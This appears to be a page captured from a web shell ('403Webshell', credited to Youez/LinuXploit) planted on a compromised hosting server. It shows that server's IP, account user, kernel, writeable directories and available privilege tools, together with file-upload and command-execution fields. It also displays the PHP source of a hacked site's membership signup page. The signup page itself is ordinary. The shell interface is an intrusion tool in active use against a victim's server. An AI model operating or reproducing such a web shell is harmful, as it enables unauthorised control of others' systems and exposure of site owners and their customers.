403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/honeyschool.com/public_html/sfw/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/honeyschool.com/public_html/sfw/join.php
<?php include_once('config.php'); ?><!doctype html>
<html lang="en">
<head>
	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
	<title>Legal This Week  ยป Join</title>
	<link rel="stylesheet" type="text/css" href="css/styles.css" />
</head>
<body>

	<?php include_once("header.php"); ?> 

	
	<section id="join" class="section sectionJoin">

		<div class="container">

			<h2 class="sectionTitle">YOU MUST BE LOGGED IN TO WATCH <em>HONEY SCHOOL</em> VIDEOS</h2>

			<div class="player">
				<div class="playerVideo">
					<div class="playerVideoLoading"><i></i></div>
					<div class="playerVideoPlay" style="display: none;"><img src="images/icon-play.png" alt="Play" /></div>
					<img src="sets/video/<?=$selected;?>.jpg" />
				</div>
				
				<div class="playerControls">
				
					<div class="playerPlay"><i></i></div>
				
					<div class="playerTimebar">
						<div class="progress">
							<div id="progressBar" class="progressBar" role="progressbar" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100" style="width:0%;"></div>
						</div>
					</div>
				
					<div class="playerSound"><i></i></div>
					<div class="playerTime"><?=mt_rand(15,30).':'.mt_rand(10,59);?></div>
					<div class="playerQuality">HD</div>
				
				</div>
			</div>

			<div class="playerJoin">
				
				<form id="joinForm" action="join.php">

					<div class="formColumn membership">
						<fieldset>
							<h2><span>1</span> <strong>Select <span class="hdm">Your</span> Membership Plan:</strong></h2>
							<p class="radiofield">
								<label>
									<input type="radio" name="membership" value="1" checked="checked" />
									<span>
										<span>&nbsp;</span>
										<em>
											<strong>1 Month Special $19.95</strong>
											<small>(Initial: 1 Month $29.95 , Rebills Every 30 Days at $29.95) </small>
										</em>
										<strong class="amount">$<span>29<sup>.95</sup><sub>/month</sub></span></strong>
									</span>
								</label>
							</p>
							<p class="radiofield">
								<label>
									<input type="radio" name="membership" value="2" />
									<span>
										<span>&nbsp;</span>
										<em>
											<strong>Yearly Deal $9.99/Month</strong>
											<small>$9.99 Monthly Rate, billed at $119.95 </small>
										</em>
										<strong class="amount">$<span>119<sup>.95</sup><sub>/month</sub></span></strong>
									</span>
								</label>
							</p>
							<p class="radiofield">
								<label>
									<input type="radio" name="membership" value="3" />
									<span>
										<span>&nbsp;</span>
										<em>
											<strong>3 Days Full Access</strong>
											<small>(Initial: $4.95, 3 Days Access) rebills $29.95 monthly </small>
										</em>
										<strong class="amount">$<span>4<sup>.95</sup><sub>/month</sub></span></strong>
									</span>
								</label>
							</p>
						
							
						</fieldset>
					</div>


					<div class="formColumn membership">
						<fieldset>
							<h2><span>2</span> <strong>Select payment method:</strong></h2>
							<p class="radiofield radiofieldInline">
								<label>
									<input type="radio" name="paymentmethod" value="1" checked />
									<span>
										<span>&nbsp;</span>
										<em><span class="pmJB">Join by</span> <span class="pmTxt">Credit Card</span> <img src="images/icon-credit_cards.png" alt="Credit Cards" width="80" height="32" /></em>
									</span>
								</label>
							</p>
							<p class="radiofield radiofieldInline">
								<label>
									<input type="radio" name="paymentmethod" value="2" />
									<span>
										<span>&nbsp;</span>
										<em><span class="pmJB">Join by</span> <span class="pmTxt">Crypto Currency</span> <img src="images/icon-crypto.png" alt="Credit Cards" width="35" height="34" /></em>
									</span>
								</label>
							</p>
						</fieldset>
					</div>



					<div class="submit">
						<button type="submit" class="btn btnMd hb bgGrad2 btnSubmit">Get Access Now</button><br><span class="paymentNoteSecureGateway">You will be redirect to our secure gateway</span>
					</div>
					<!-- /.submit -->

				</form>

			</div>

		</div>
		
	</section>


	<section class="section sectionMoreVideos">
		
		<div class="container">

			<h2 class="sectionTitle">Most Popular Videos</h2>
			
			<div class="block">
<?php foreach ($mostpopular as $set => $ignore) : ?>
				<div class="blockItem">
					<article class="update">
						<a href="join.php?c=<?=$sets[$set];?>" class="hi">
							<figure><img src="sets/mostpopular/<?=$sets[$set];?>.jpg" alt="Most popular <?=$sets[$set];?>" /></figure>
						</a>
					</article>

				</div>

<?php endforeach; ?>

			</div>

		</div>

	</section>



<?php include_once('footer.php'); ?>


<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/fn.min.js"></script>
<script type="text/javascript" src="js/fn-player.min.js"></script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit